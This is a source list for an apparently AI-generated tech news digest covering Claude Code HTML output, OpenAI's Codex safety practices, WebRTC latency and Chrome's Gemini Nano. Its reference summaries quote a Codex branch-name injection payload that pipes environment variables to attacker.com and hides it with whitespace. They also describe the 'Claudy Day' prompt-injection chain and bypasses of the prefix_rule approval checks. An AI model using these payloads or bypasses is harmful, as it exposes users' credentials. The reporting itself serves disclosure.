Claude pushes HTML at 18×, OpenAI ships Codex safety post, Curley flags WebRTC
Every URL the pipeline pulled into ranking for this issue — primary sources plus the supporting and contradicting findings each Researcher returned. Inline citations in the issue point back here.
Sources
Using Claude Code: The Unreasonable Effectiveness of HTML simonwillison.net
Using Claude Code: The Unreasonable Effectiveness of HTML Thought-provoking piece by Thariq Shihipar (on the Claude Code team at Anthropic) advocating for HTML over Markdown as an output format to request from Claude. The article is crammed with interesting examples (collected on this site ) and prompt suggestions like this one: Help me review this PR by creating an HTML artifact that describes it. I’m not very familiar with the streaming/backpressure logic so focus on that. Render the actual d…
Running Codex safely at OpenAI openai.com
How OpenAI runs Codex securely with sandboxing, approvals, network policies, and agent-native telemetry to support safe and compliant coding agent adoption.
Quoting Luke Curley simonwillison.net
WebRTC is designed to degrade and drop my prompt during poor network conditions. wtf my dude WebRTC aggressively drops audio packets to keep latency low. If you’ve ever heard distorted audio on a conference call, that’s WebRTC baybee. The idea is that conference calls depend on rapid back-and-forth, so pausing to wait for audio is unacceptable. …but as a user, I would much rather wait an extra 200ms for my slow/expensive prompt to be accurate. After all, I’m paying good money to boil the ocean,…
Chrome’s 4GB AI model isn’t new, but you’re not wrong for being confused arstechnica.com
Chrome’s 4GB local Gemini Nano download isn’t a new addition, despite renewed user confusion — the model has been quietly shipping with the browser to power on-device AI features, and Ars walks through the opaque settings users can toggle to remove it.
References
RecSys Frontier (AI Daily 2026-05-09) recsys-frontier.com
A comparison of the Cloudflare blog found that the HTML version consumed over 72,000 tokens, while the equivalent Markdown version required fewer than 4,000 — a 94.9% reduction.
Medium — Optimal Prompt Formats for LLMs (Dupree) medium.com
XML is frequently the worst performer in reasoning-heavy benchmarks. Its repetitive tag structure is token-inefficient and can cause ‘attention diffusion,’ where the model’s focus is diluted by redundant characters.
TechRadar — Claude AI vulnerabilities techradar.com
The ‘Claudy Day’ attack sequence combined an open redirect on claude.com with invisible prompt injection via URL parameters… untrusted JavaScript within an Artifact could perform silent API calls using the viewing user’s authenticated session.
ImprovingAgents — Best Nested Data Format improvingagents.com
If an LLM is asked for an ‘answer’ field before a ‘reasoning’ field… accuracy drops precipitously because the model cannot utilize its auto-regressive property to ‘think through’ the problem before committing to a result.
baoyu.io translation of Shihipar thread baoyu.io
Examples include a ‘Corporate Translator’ with a Windows 95-style UI, design-system prototypes with live sliders, and PR review dashboards with color-coded diffs and margin annotations.
Tactiq — Claude system prompt analysis tactiq.io
Claude’s internal system prompt explicitly mandates Markdown for code snippets… and is trained to avoid excessive Markdown or list formatting in casual ‘chit-chat’ scenarios.
HackRead — BeyondTrust Codex token-theft disclosure hackread.com
By crafting a branch name containing backticks or semicolons—such as
main; curl attacker.com/$(env | base64)—an attacker could execute arbitrary code… 94 Ideographic Space characters (U+3000) followed by|| true… pushed off-screen in the Codex and ChatGPT web interfaces.
VentureBeat — ‘Six exploits broke AI coding agents’ venturebeat.com
Researchers identified a critical sandbox escape (CVE-2026-305) involving improper isolation in the JavaScript runtime, which allowed remote attackers to execute code in the user’s context.
azukiazusa.dev — Codex sandbox & agent authorization writeup azukiazusa.dev
If rules are too broad—such as auto-approving any command starting with a shell like
/usr/bin/zsh—theprefix_rulebecomes effectively useless, as an attacker can simply wrap malicious payloads inside the permitted prefix.
Trail of Bits — ‘Insecure credential storage plagues MCP’ blog.trailofbits.com
approximately 48-53% of reviewed MCP servers recommend or implement insecure storage methods, such as hardcoding API keys in
.envor JSON configuration files…claude_desktop_config.json… has been observed to have world-readable permissions on macOS.
Cybernews — Huntress on Codex triggering EDR false positives cybernews.com
Codex’s legitimate troubleshooting actions can mimic attacker tradecraft, triggering false positives in EDR systems and complicating incident response.
GitHub issue #45994 (Codex CLI prefix_rule brittleness) github.com
prefix_rulematching often fails when commands are shell-wrapped (e.g.,/bin/zsh -lc) or preceded by environment variables … results in repetitive approval prompts and overly specific rules.
Luke Curley, moq.dev (original post) moq.dev
It is impossible to even retransmit a WebRTC audio packet within a browser; we tried at Discord. The implementation is hard-coded for real-time latency or else.
Philipp Hancke, webrtcHacks (measurement post) webrtchacks.com
Median response latency of approximately 1.7 to 1.8 seconds… STUN RTTs of 60-70ms and bumps in the data suggesting packet loss
eesel.ai — Realtime API vs WebRTC eesel.ai
WebRTC (UDP) typically achieves ~150ms vs 200ms+ for WebSockets… direct client-side WebSocket connections risk leaking long-lived API keys, whereas WebRTC uses 60-second ephemeral keys
Ant Group / AntRTC, IETF 125 MoQ slides datatracker.ietf.org
Production deployment for Taobao Voice Search and Alipay AI Assistants reports smoother interactions under 30%+ packet-loss conditions and lower first-frame latency than WebRTC for cloud-rendered digital avatars
Forasoft — MoQ Streaming 2026 forasoft.com
Production-grade MoQ relays are delivering 200–300ms glass-to-glass latency… WHIP/WHEP (WebRTC-based) is more mature but up to 15x more expensive to scale than MoQ’s relay-based model
r/programming discussion on Curley’s post reddit.com
Critics from the WebRTC community, including creators of the Pion library, argue connection establishment can be reduced to significantly fewer than eight RTTs and that WebRTC remains the only robust way to handle Acoustic Echo Cancellation out of the box